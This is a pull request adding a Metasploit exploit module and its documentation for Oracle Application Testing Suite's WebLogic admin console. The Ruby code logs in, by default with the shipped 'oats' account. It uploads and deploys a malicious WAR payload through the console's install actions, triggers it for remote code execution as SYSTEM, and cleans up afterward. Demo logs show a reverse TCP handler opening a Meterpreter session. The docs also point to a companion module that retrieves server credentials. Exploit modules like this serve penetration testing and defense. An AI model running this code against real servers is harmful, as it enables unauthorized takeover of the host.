### PR TITLE
Add Exploit: Oracle Application Testing Suite WebLogic Server Administration Console War Deployment

### DIFF
--- a/documentation/modules/exploit/windows/http/oats_weblogic_console.md
+++ b/documentation/modules/exploit/windows/http/oats_weblogic_console.md
@@ -1,5 +1,4 @@
-
-## Background
+## Description
 
 Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing solution for web applications, web services, packaged Oracle applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager.
 

--- a/documentation/modules/exploit/windows/http/oats_weblogic_console.md
+++ b/documentation/modules/exploit/windows/http/oats_weblogic_console.md
@@ -40,13 +40,14 @@ msf5 exploit(windows/http/oats_weblogic_console) > run
 
 [*] Started reverse TCP handler on 172.16.135.1:4444 
 [+] Logged in as oats:VeryPhat1337
-[*] Ready for war. Codename "tammy" at 6255 bytes
-[*] FRSC value: 0xd0b28cc3e93f75d2b2941eb17a40415c158918f498f5cdcc
-[*] Server replies: "The file tammy.war has been uploaded successfully to C:\\OracleATS\\oats\\servers\\AdminServer\\upload"
-[*] Operation tammy is a go!
+[*] Ready for war. Codename "lawrence" at 6256 bytes
+[*] FRSC value: 0x59c5c771ae7d83c8440d7c45d2610dca5a0aa304a9e89e4c
+[*] Server replies: "The file lawrence.war has been uploaded successfully to C:\\OracleATS\\oats\\servers\\AdminServer\\upload"
+[+] Operation "lawrence" is a go!
+[*] Code 200 on "lawrence" request
 [*] Sending stage (53866 bytes) to 172.16.135.128
-[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:50144) at 2019-05-16 16:24:02 -0500
-[+] Successfully undeployed tammy.war
+[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49337) at 2019-05-18 18:07:27 -0500
+[+] Successfully undeployed lawrence.war
 
 meterpreter >
 ```

--- a/documentation/modules/exploit/windows/http/oats_weblogic_console.md
+++ b/documentation/modules/exploit/windows/http/oats_weblogic_console.md
@@ -1,0 +1,52 @@
+
+## Background
+
+Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing solution for web applications, web services, packaged Oracle applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager.
+
+In the administrator console, the deployement feature can be abused to upload an arbitrary WAR file, allowing remote code execution under the context of SYSTEM. Authentication is required.
+
+
+## Vulnerable Application
+
+The following is the exact setup I used to test and analyze the vulnerability:
+
+- Windows Server 2008 R2 x64 (other Windows systems are also supported)
+  - .Net Framework 3.5 enabled (from add/remove features)
+  - IE ESC (from Server Manager) disabled
+  - 8GB of RAM (at least more than 4GB will be used to run OATS)
+  - Duel-Core processor
+- oats-win64-full-13.3.0.1.262.zip (x86 did not work for me)
+- Jdk-7u21-windows-x64.exe
+- OracleXE112_Win64.zip (Newer version 18c did not work well for me)
+- Firefox (I had to install this because IE on Win2k8 is completely outdated)
+- Adobe Flash installed (IE ESC needs to be disabled in order to install this)
+
+For installation instructions, please refer to the Oracle Application Testing Suite Installation Guide.
+
+## Notes
+
+For Oracle Application Testing Suite (OATS), you may use the auxiliary/gather/oats_downloadservlet_traversal module to download the server's encrypted credentials, decrypt them using a third-party tool, and then use this module to gain remote code execution.
+
+## Credit
+
+Special thanks to Steven Seeley to assist on the development of the Metasploit module.
+
+## Demo
+
+```
+msf5 exploit(windows/http/oats_weblogic_console) > check
+[*] 172.16.135.128:8088 - The target service is running, but could not be validated.
+msf5 exploit(windows/http/oats_weblogic_console) > run
+
+[*] Started reverse TCP handler on 172.16.135.1:4444 
+[+] Logged in as oats:VeryPhat1337
+[*] Ready for war. Codename "tammy" at 6255 bytes
+[*] FRSC value: 0xd0b28cc3e93f75d2b2941eb17a40415c158918f498f5cdcc
+[*] Server replies: "The file tammy.war has been uploaded successfully to C:\\OracleATS\\oats\\servers\\AdminServer\\upload"
+[*] Operation tammy is a go!
+[*] Sending stage (53866 bytes) to 172.16.135.128
+[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:50144) at 2019-05-16 16:24:02 -0500
+[+] Successfully undeployed tammy.war
+
+meterpreter >
+```

--- a/modules/exploits/windows/http/oats_weblogic_console.rb
+++ b/modules/exploits/windows/http/oats_weblogic_console.rb
@@ -117,8 +117,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def is_logged_in?(res)
     html = res.get_html_document
     a_element = html.at('a')
-    link = a_element.attributes['href'].value
-    URI(link).request_uri == '/console'
+    if a_element.respond_to?(:attributes) && a_element.attributes['href']
+      link = a_element.attributes['href'].value
+      return URI(link).request_uri == '/console'
+    end
+
+    false
   end
 
   def do_login
@@ -374,6 +378,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    unless check == Exploit::CheckCode::Detected
+      print_status('Target does not have the login page we are looking for.')
+      return
+    end
+
     do_login
     print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}")
     print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")

--- a/modules/exploits/windows/http/oats_weblogic_console.rb
+++ b/modules/exploits/windows/http/oats_weblogic_console.rb
@@ -173,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     html = res.get_html_document
     hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]')
-    frsc_attr = hidden_input.attributes['value']
+    frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil
     frsc_attr ? frsc_attr.value : ''
   end
 

--- a/modules/exploits/windows/http/oats_weblogic_console.rb
+++ b/modules/exploits/windows/http/oats_weblogic_console.rb
@@ -1,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Oracle WebLogic Server Administration Console War Deployment',
+      'Description'    => %q{
+        This module abuses a feature in WebLogic Server's Administration Console to install
+        a malicious Java application in order to gain remote code execution. Authentication
+        is required, however by default, Oracle ships with a "oats" account that you could
+        log in with, which grants you administrator access.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Steven Seeley', # Used the trick and told me about it
+          'sinn3r'         # Metasploit module
+        ],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'WebLogic Server Administration Console 12 or prior', { } ]
+        ],
+      'References'     =>
+        [
+          # The CVE description matches what this exploit is doing, but it was for version
+          # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.
+          ['CVE', '2007-2699']
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8088
+        },
+      'Notes'          =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 13 2019',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
+        OptString.new('HttpUsername', [true, 'The username for the admin console', 'oats']),
+        OptString.new('HttpPassword', [true, 'The password for the admin console'])
+      ])
+  end
+
+  class LoginSpec
+    attr_accessor :admin_console_session
+  end
+
+  def login_spec
+    @login_spec ||= LoginSpec.new
+  end
+
+  class OatsWarPayload < MetasploitModule
+    attr_reader :name
+    attr_reader :war
+
+    def initialize(payload)
+      @name = Rex::Text.rand_text_alphanumeric(10)
+      @war = payload.encoded_war(app_name: name).to_s
+    end
+  end
+
+  def check
+  end
+
+  def set_admin_console_session(res)
+    cookie = res.get_cookies
+    admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first
+    login_spec.admin_console_session = admin_console_session
+  end
+
+  def is_logged_in?(res)
+    html = res.get_html_document
+    a_element = html.at('a')
+    link = a_element.attributes['href'].value
+    URI(link).request_uri == '/console'
+  end
+
+  def do_login!
+    uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    fail_with(Failure::Unknown, 'No response from server') unless res
+    set_admin_console_session(res)
+
+    uri = normalize_uri(target_uri.path, 'console', 'j_security_check')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'headers' =>
+        {
+          'Upgrade-Insecure-Requests' => 1
+        },
+      'vars_post' =>
+        {
+          'j_username'           => datastore['HttpUsername'],
+          'j_password'           => datastore['HttpPassword'],
+          'j_character_encoding' => 'UTF-8'
+        }
+    })
+
+    fail_with(Failure::Unknown, 'No response from server') unless res
+    fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
+    store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
+    set_admin_console_session(res)
+  end
+
+  def exploit
+    do_login!
+    print_good("Logged in as #{datastore['HttpUsername']}:#{datastore['HttpPassword']}")
+    war_payload = OatsWarPayload.new(payload)
+    puts war_payload.name.inspect
+    puts war_payload.war.inspect
+  end
+end

--- a/modules/exploits/windows/http/oats_weblogic_console.rb
+++ b/modules/exploits/windows/http/oats_weblogic_console.rb
@@ -379,6 +379,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def setup
     @is_cleanup_ready = false
+    super
   end
 
   def exploit

--- a/modules/exploits/windows/http/oats_weblogic_console.rb
+++ b/modules/exploits/windows/http/oats_weblogic_console.rb
@@ -331,11 +331,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def goto_war(name)
-    print_status("Operation #{name} is a go!")
-    send_request_cgi({
+    print_good("Operation \"#{name}\" is a go!")
+    res = send_request_cgi({
       'method' => 'GET',
       'uri'    => normalize_uri(target_uri.path, name)
     })
+
+    print_status("Code #{res.code} on \"#{name}\" request") if res
   end
 
   def undeploy_war
@@ -371,8 +373,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cleanup
-    undeploy_war if payload
+    undeploy_war if is_cleanup_ready
     super
+  end
+
+  def setup
+    @is_cleanup_ready = false
   end
 
   def exploit
@@ -380,8 +386,12 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Logged in as #{datastore['HttpUsername']}:#{datastore['HttpPassword']}")
     print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")
     result = deploy_war
-    goto_war(war_payload.name) if result
+    if result
+      @is_cleanup_ready = true
+      goto_war(war_payload.name)
+    end
   end
 
   attr_reader :frsc
+  attr_reader :is_cleanup_ready
 end

--- a/modules/exploits/windows/http/oats_weblogic_console.rb
+++ b/modules/exploits/windows/http/oats_weblogic_console.rb
@@ -3,12 +3,12 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'rkelly'
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
   include Msf::Auxiliary::Report
 
   def initialize(info={})
@@ -19,6 +19,10 @@ class MetasploitModule < Msf::Exploit::Remote
         a malicious Java application in order to gain remote code execution. Authentication
         is required, however by default, Oracle ships with a "oats" account that you could
         log in with, which grants you administrator access.
+
+        Please note that while the war payload is in use, the module will not be able to
+        clean up after itself, therefore you are expected to undeploy the payload manually
+        from the administrator's console.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -36,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           # The CVE description matches what this exploit is doing, but it was for version
           # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.
-          ['CVE', '2007-2699']
+          # ['CVE', '2007-2699']
         ],
       'DefaultOptions' =>
         {
@@ -44,7 +48,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Notes'          =>
         {
-          'SideEffects' => [ IOC_IN_LOGS ]
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
         },
       'Privileged'     => false,
       'DisclosureDate' => 'Mar 13 2019',
@@ -55,6 +60,11 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
         OptString.new('HttpUsername', [true, 'The username for the admin console', 'oats']),
         OptString.new('HttpPassword', [true, 'The password for the admin console'])
+      ])
+
+    register_advanced_options(
+      [
+        OptString.new('DEFAULTOATSPATH', [false, 'The default path for OracleATS'])
       ])
   end
 
@@ -71,17 +81,41 @@ class MetasploitModule < Msf::Exploit::Remote
     attr_reader :war
 
     def initialize(payload)
-      @name = Rex::Text.rand_text_alphanumeric(10)
+      @name = Rex::Text.rand_name
       @war = payload.encoded_war(app_name: name).to_s
     end
   end
 
+  def default_oats_path
+    @default_oats_path ||= lambda { datastore['DEFAULTOATSPATH'] || 'C:\\OracleATS' }.call
+  end
+
+  def war_payload
+    @war_payload ||= OatsWarPayload.new(payload)
+  end
+
+  def set_frsc
+    value = get_deploy_frsc
+    @frsc = value
+  end
+
   def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
+    })
+
+    if res && res.body.include?('Oracle WebLogic Server Administration Console')
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
   end
 
   def set_admin_console_session(res)
     cookie = res.get_cookies
     admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first
+    vprint_status("Token for console session is: #{admin_console_session}")
     login_spec.admin_console_session = admin_console_session
   end
 
@@ -92,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
     URI(link).request_uri == '/console'
   end
 
-  def do_login!
+  def do_login
     uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')
     res = send_request_cgi({
       'method' => 'GET',
@@ -107,10 +141,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri'    => uri,
       'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
-      'headers' =>
-        {
-          'Upgrade-Insecure-Requests' => 1
-        },
       'vars_post' =>
         {
           'j_username'           => datastore['HttpUsername'],
@@ -119,17 +149,243 @@ class MetasploitModule < Msf::Exploit::Remote
         }
     })
 
-    fail_with(Failure::Unknown, 'No response from server') unless res
+    fail_with(Failure::Unknown, 'No response while trying to log in') unless res
     fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
     store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
     set_admin_console_session(res)
   end
 
-  def exploit
-    do_login!
-    print_good("Logged in as #{datastore['HttpUsername']}:#{datastore['HttpPassword']}")
-    war_payload = OatsWarPayload.new(payload)
-    puts war_payload.name.inspect
-    puts war_payload.war.inspect
+  def get_deploy_frsc
+    # First we are just going through the pages in a specific order to get the FRSC value
+    # we need to prepare uploading the WAR file.
+    res = nil
+    requests =
+      [
+        { path: 'console/', vars: {} },
+        { path: 'console/console.portal', vars: {'_nfpb'=>"true"} },
+        { path: 'console/console.portal', vars: {'_nfpb'=>"true", '_pageLabel' => 'HomePage1'} }
+      ]
+
+    requests.each do |req|
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, req[:path]),
+        'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+        'vars_get' => req[:vars]
+      })
+
+      fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res
+    end
+
+    html = res.get_html_document
+    record_link = html.at('a[@id="recordLink"]')
+    fail_with(Failure::Unknown, 'Unable to find recordLink') unless record_link
+    onclick_attr = record_link.attributes['onclick']
+    fail_with(Failure::Unknown, 'Unable to find onclick attribute') unless onclick_attr
+    js = onclick_attr.value
+
+    # Now that we have the onclick attribute from the link, we will extract the second
+    # parameter from the JavaScript function call, which is our frsc value.
+    rk = RKelly::Parser.new.parse(js)
+    arguments = rk.grep(RKelly::Nodes::StringNode)
+    arguments.last.value.scan(/'(.+)'/).flatten.first || ''
   end
+
+  def do_select_upload_action
+    action = '/com/bea/console/actions/app/install/selectUploadApp'
+    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'    => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get'  =>
+        {
+          'AppApplicationInstallPortlet_actionOverride' => action
+        },
+      'vars_post' =>
+        {
+          'AppApplicationInstallPortletselectedAppPath' => app_path,
+          'AppApplicationInstallPortletfrsc' => frsc
+        }
+    })
+
+    fail_with(Failure::Unknown, "No response from #{action}") unless res
+  end
+
+  def do_upload_app_action
+    action = '/com/bea/console/actions/app/install/uploadApp'
+    ctype = 'application/octet-stream'
+    app_cname = 'AppApplicationInstallPortletuploadAppPath'
+    plan_cname = 'AppApplicationInstallPortletuploadPlanPath'
+    frsc_cname = 'AppApplicationInstallPortletfrsc'
+    war = war_payload.war
+    war_name = war_payload.name
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(war, ctype, 'binary', "form-data; name=\"#{app_cname}\"; filename=\"#{war_name}.war\"")
+    post_data.add_part('', ctype, nil, "form-data; name=\"#{plan_cname}\"; filename=\"\"")
+    post_data.add_part(frsc, nil, nil, "form-data; name=\"#{frsc_cname}\"")
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get' =>
+        {
+          'AppApplicationInstallPortlet_actionOverride' => action
+        },
+       'ctype'   => "multipart/form-data; boundary=#{post_data.bound}",
+       'data'    => post_data.to_s
+    })
+
+    fail_with(Failure::Unknown, "No response from #{action}") unless res
+    print_response_message(res)
+  end
+
+  def do_app_select_action
+    action = '/com/bea/console/actions/app/install/appSelected'
+    war_name = war_payload.name
+    app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get' =>
+        {
+          'AppApplicationInstallPortlet_actionOverride' => action
+        },
+      'vars_post' =>
+        {
+          'AppApplicationInstallPortletselectedAppPath' => app_path,
+          'AppApplicationInstallPortletfrsc'            => frsc
+        }
+    })
+
+    fail_with(Failure::Unknown, "No response from #{action}") unless res
+    print_response_message(res)
+  end
+
+  def do_style_select_action
+    action = '/com/bea/console/actions/app/install/targetStyleSelected'
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get' =>
+        {
+          'AppApplicationInstallPortlet_actionOverride' => action
+        },
+      'vars_post' =>
+        {
+          'AppApplicationInstallPortlettargetStyle' => 'Application',
+          'AppApplicationInstallPortletfrsc'        => frsc
+        }
+    })
+
+    fail_with(Failure::Unknown, "No response from #{action}") unless res
+  end
+
+  def do_finish_action
+    action = '/com/bea/console/actions/app/install/finish'
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get' =>
+        {
+          'AppApplicationInstallPortlet_actionOverride' => action
+        },
+      'vars_post' =>
+        {
+          'AppApplicationInstallPortletname'             => war_payload.name,
+          'AppApplicationInstallPortletsecurityModel'    => 'DDOnly',
+          'AppApplicationInstallPortletstagingStyle'     => 'Default',
+          'AppApplicationInstallPortletplanStagingStyle' => 'Default',
+          'AppApplicationInstallPortletfrsc'             => frsc
+        }
+    })
+
+    fail_with(Failure::Unknown, "No response from #{action}") unless res
+    print_response_message(res)
+
+    # 302 is a good enough indicator of a successful upload, otherwise
+    # the server would actually return a 200 with an error message.
+    res.code == 302
+  end
+
+  def print_response_message(res)
+    html = res.get_html_document
+    message_div = html.at('div[@class="message"]')
+    if message_div
+      msg = message_div.at('span').text
+      print_status("Server replies: #{msg.inspect}")
+    end
+  end
+
+  def deploy_war
+    set_frsc
+    print_status("FRSC value: #{frsc}")
+    do_select_upload_action
+    do_upload_app_action
+    do_app_select_action
+    do_style_select_action
+    do_finish_action
+  end
+
+  def goto_war(name)
+    print_status("Operation #{name} is a go!")
+    send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, name)
+    })
+  end
+
+  def undeploy_war
+    war_name = war_payload.name
+    handle = 'com.bea.console.handles.JMXHandle("com.bea:Name=oats,Type=Domain")'
+    contents = %Q|com.bea.console.handles.AppDeploymentHandle("com.bea:Name=#{war_name},Type=AppDeployment")|
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'console', 'console.portal'),
+      'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
+      'vars_get' =>
+        {
+          'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',
+          'AppDeploymentsControlPortlethandle' => handle
+        },
+      'vars_post' =>
+        {
+          # For some reason, the value given to the server is escapped twice.
+          # The Metasploit API should do it at least once.
+          'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),
+          '_pageLabel' => 'AppApplicationUninstallPage',
+          '_nfpb'      => 'true',
+          'AppApplicationUninstallPortletfrsc' => frsc
+        }
+    })
+
+    if res && res.code == 302
+      print_good("Successfully undeployed #{war_name}.war")
+    else
+      print_warning("Unable to successfully undeploy #{war_name}.war")
+      print_warning('You may want to do so manually.')
+    end
+  end
+
+  def cleanup
+    undeploy_war if payload
+    super
+  end
+
+  def exploit
+    do_login
+    print_good("Logged in as #{datastore['HttpUsername']}:#{datastore['HttpPassword']}")
+    print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")
+    result = deploy_war
+    goto_war(war_payload.name) if result
+  end
+
+  attr_reader :frsc
 end

--- a/modules/exploits/windows/http/oats_weblogic_console.rb
+++ b/modules/exploits/windows/http/oats_weblogic_console.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rkelly'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -174,17 +172,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     html = res.get_html_document
-    record_link = html.at('a[@id="recordLink"]')
-    fail_with(Failure::Unknown, 'Unable to find recordLink') unless record_link
-    onclick_attr = record_link.attributes['onclick']
-    fail_with(Failure::Unknown, 'Unable to find onclick attribute') unless onclick_attr
-    js = onclick_attr.value
-
-    # Now that we have the onclick attribute from the link, we will extract the second
-    # parameter from the JavaScript function call, which is our frsc value.
-    rk = RKelly::Parser.new.parse(js)
-    arguments = rk.grep(RKelly::Nodes::StringNode)
-    arguments.last.value.scan(/'(.+)'/).flatten.first || ''
+    hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]')
+    frsc_attr = hidden_input.attributes['value']
+    frsc_attr ? frsc_attr.value : ''
   end
 
   def do_select_upload_action

--- a/modules/exploits/windows/http/oats_weblogic_console.rb
+++ b/modules/exploits/windows/http/oats_weblogic_console.rb
@@ -19,10 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote
         a malicious Java application in order to gain remote code execution. Authentication
         is required, however by default, Oracle ships with a "oats" account that you could
         log in with, which grants you administrator access.
-
-        Please note that while the war payload is in use, the module will not be able to
-        clean up after itself, therefore you are expected to undeploy the payload manually
-        from the administrator's console.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/windows/http/oats_weblogic_console.rb
+++ b/modules/exploits/windows/http/oats_weblogic_console.rb
@@ -43,7 +43,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Notes'          =>
         {
           'SideEffects' => [ IOC_IN_LOGS ],
-          'Reliability' => [ REPEATABLE_SESSION ]
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
         },
       'Privileged'     => false,
       'DisclosureDate' => 'Mar 13 2019',
@@ -52,13 +53,13 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
-        OptString.new('HttpUsername', [true, 'The username for the admin console', 'oats']),
-        OptString.new('HttpPassword', [true, 'The password for the admin console'])
+        OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),
+        OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])
       ])
 
     register_advanced_options(
       [
-        OptString.new('DEFAULTOATSPATH', [false, 'The default path for OracleATS'])
+        OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
       ])
   end
 
@@ -75,13 +76,13 @@ class MetasploitModule < Msf::Exploit::Remote
     attr_reader :war
 
     def initialize(payload)
-      @name = Rex::Text.rand_name
+      @name = [Faker::App.name, Rex::Text.rand_name].sample
       @war = payload.encoded_war(app_name: name).to_s
     end
   end
 
   def default_oats_path
-    @default_oats_path ||= lambda { datastore['DEFAULTOATSPATH'] || 'C:\\OracleATS' }.call
+    datastore['DefaultOatsPath']
   end
 
   def war_payload
@@ -137,15 +138,15 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie' => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
       'vars_post' =>
         {
-          'j_username'           => datastore['HttpUsername'],
-          'j_password'           => datastore['HttpPassword'],
+          'j_username'           => datastore['OATSUSERNAME'],
+          'j_password'           => datastore['OATSPASSWORD'],
           'j_character_encoding' => 'UTF-8'
         }
     })
 
     fail_with(Failure::Unknown, 'No response while trying to log in') unless res
     fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
-    store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
+    store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
     set_admin_console_session(res)
   end
 
@@ -374,7 +375,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     do_login
-    print_good("Logged in as #{datastore['HttpUsername']}:#{datastore['HttpPassword']}")
+    print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}")
     print_status("Ready for war. Codename \"#{war_payload.name}\" at #{war_payload.war.length} bytes")
     result = deploy_war
     if result

--- a/modules/exploits/windows/http/oats_weblogic_console.rb
+++ b/modules/exploits/windows/http/oats_weblogic_console.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => 'Oracle WebLogic Server Administration Console War Deployment',
+      'Name'           => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',
       'Description'    => %q{
         This module abuses a feature in WebLogic Server's Administration Console to install
         a malicious Java application in order to gain remote code execution. Authentication


### PR DESCRIPTION
## Background 

This module abuses a feature in Oracle Application Testing Suite WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a "oats" account that you could log in with, which grants you administrator access.

## Setup

The following is the exact setup I used to test and analyze the vulnerability:

- Windows Server 2008 R2 x64 (other Windows systems are also supported)
  - .Net Framework 3.5 enabled (from add/remove features)
  - IE ESC (from Server Manager) disabled
  - 8GB of RAM (at least more than 4GB will be used to run OATS)
  - Duel-Core processor
- oats-win64-full-13.3.0.1.262.zip (x86 did not work for me)
- Jdk-7u21-windows-x64.exe
- OracleXE112_Win64.zip (Newer version 18c did not work well for me)
- Firefox (I had to install this because IE on Win2k8 is completely outdated)
- Adobe Flash installed (IE ESC needs to be disabled in order to install this)

For installation instructions, please refer to the [Oracle Application Testing Suite Installation Guide](https://docs.oracle.com/cd/E75776_01/doc.1250/e55188/toc.htm).

## Verification

- [ ] Install OATS by following the instructions above
- [ ] load the Metasploit module
- [ ] Set the rhosts, HttpUsername, and HttpPassword
- [ ] `run`

## Demo

```
msf5 exploit(windows/http/oats_weblogic_console) > check
[*] 172.16.135.128:8088 - The target service is running, but could not be validated.
msf5 exploit(windows/http/oats_weblogic_console) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as oats:VeryPhat1337
[*] Ready for war. Codename "lawrence" at 6256 bytes
[*] FRSC value: 0x59c5c771ae7d83c8440d7c45d2610dca5a0aa304a9e89e4c
[*] Server replies: "The file lawrence.war has been uploaded successfully to C:\\OracleATS\\oats\\servers\\AdminServer\\upload"
[+] Operation "lawrence" is a go!
[*] Code 200 on "lawrence" request
[*] Sending stage (53866 bytes) to 172.16.135.128
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49337) at 2019-05-18 18:07:27 -0500
[+] Successfully undeployed lawrence.war

meterpreter >
```